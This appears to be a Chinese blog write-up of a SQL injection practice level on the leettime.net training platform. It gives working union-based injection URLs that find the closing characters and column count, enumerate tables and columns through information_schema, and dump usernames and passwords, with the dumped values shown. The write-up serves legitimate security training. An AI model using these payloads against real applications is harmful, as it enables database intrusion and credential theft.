![982bd8acf3c54f26f3866063f7b09f8d.png](https://i-blog.csdnimg.cn/blog_migrate/1c1c53b009cd39423f7521e937751377.jpeg)
![0385b6644d0b7b9057e2dde09d055b79.png](https://i-blog.csdnimg.cn/blog_migrate/27f3aa6fb65b55c8acf5d0460bed83b4.jpeg)
SQL注入在线练习平台(http://leettime.net)
![b7ab66a3ac0ed7a4017d8d9f57d31be1.png](https://i-blog.csdnimg.cn/blog_migrate/c8aa1abbe0712e2938a52a3f552a44a2.jpeg)
练习基础模块4
![dbc1ad41daf6116d7c182714778919c6.png](https://i-blog.csdnimg.cn/blog_migrate/b19f62038763f95e335267f340e758f4.jpeg)
1、判断闭合字符和列数
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
![bdf7ebefa974b9f8edf66243d730078f.png](https://i-blog.csdnimg.cn/blog_migrate/9f0885040ae214597e015454a78df5de.jpeg)
正常显示内容
双引号闭合 " 显示正常页面这个就不是闭合字符
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22
![26c3de27f1d4e199755a91ca430ef444.png](https://i-blog.csdnimg.cn/blog_migrate/3a73061439ca21ce8dc346933e1c0e62.jpeg)
双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27
![67c8cd41d509e2bc6cf736e424f335e5.png](https://i-blog.csdnimg.cn/blog_migrate/143338bc93915cd256a519486bffb320.jpeg)
由图片来开还有括号的存在 )
尝试闭合字符 -- - 成功
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-
![906bf8df37e01d8e59e54ef3d0629842.png](https://i-blog.csdnimg.cn/blog_migrate/24b8ac4d8cf3c709d0aa70ce1372c08d.jpeg)
接下来获取表的列数
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-
![3b0c89fb68a2050901bdc5f81e0d66cf.png](https://i-blog.csdnimg.cn/blog_migrate/77f03c580e7ab517dc8669ea69499bd6.jpeg)
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-
![b65b8a8b87ca17257e95dcd5a8b22486.png](https://i-blog.csdnimg.cn/blog_migrate/c14325a32214b6cb5d64a1eef82ec6eb.jpeg)
order by 5 -- -这个报错说明 数据表的列数为4
![fa5926753ce5f032e179ab9a5e6a2b5c.png](https://i-blog.csdnimg.cn/blog_migrate/6ea8b30c0aceed7227a0f50ac32c9db3.jpeg)
2、获取数据的数据回显点和数据获取
![7ba8704b21bd58e0613dbf30995b3bac.png](https://i-blog.csdnimg.cn/blog_migrate/e05441ad2f636fe5686d4b19aa72e704.jpeg)
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-
![87b6971547103f57c4671c7637d0b814.png](https://i-blog.csdnimg.cn/blog_migrate/07bd274cf14eabf8300f763aa406016b.jpeg)
数据在第二行的地方可以查询回显数据
数据库查询 leettime_761wHole
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-
![92f573f13ca461e351bf8d9990d27f16.png](https://i-blog.csdnimg.cn/blog_migrate/7b36b2d000bc5d75e5f274ca3e74184c.jpeg)
查询数据安装的路径/usr/@@basedir
![ced46ed9c6bbbdc0138770d63ce76d2f.png](https://i-blog.csdnimg.cn/blog_migrate/244f118a658f435776fef8451048c4d2.jpeg)
![e7cbeaab3a44e5d3d96948bb109d648c.png](https://i-blog.csdnimg.cn/blog_migrate/247bccf999e0c490ede182b8155aeea2.jpeg)
找出表名 testtable1,userlogs,users
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-
![e7cbeaab3a44e5d3d96948bb109d648c.png](https://i-blog.csdnimg.cn/blog_migrate/247bccf999e0c490ede182b8155aeea2.jpeg)
找出列明id,username,password,user_type,sec_code
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-
![c1fe3a1b70b261373a89b78713d57cf2.png](https://i-blog.csdnimg.cn/blog_migrate/c1e88da0dc88f5e1580f3e307e3b723f.jpeg)
Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-
![8f40cebf8e1ea1fdaeaefd39244e3220.png](https://i-blog.csdnimg.cn/blog_migrate/bcf9d048087d46b6edf50b2bcf05ce08.jpeg)
总结:注意熟悉information_schama这个表的结构,还有注意group_concat使用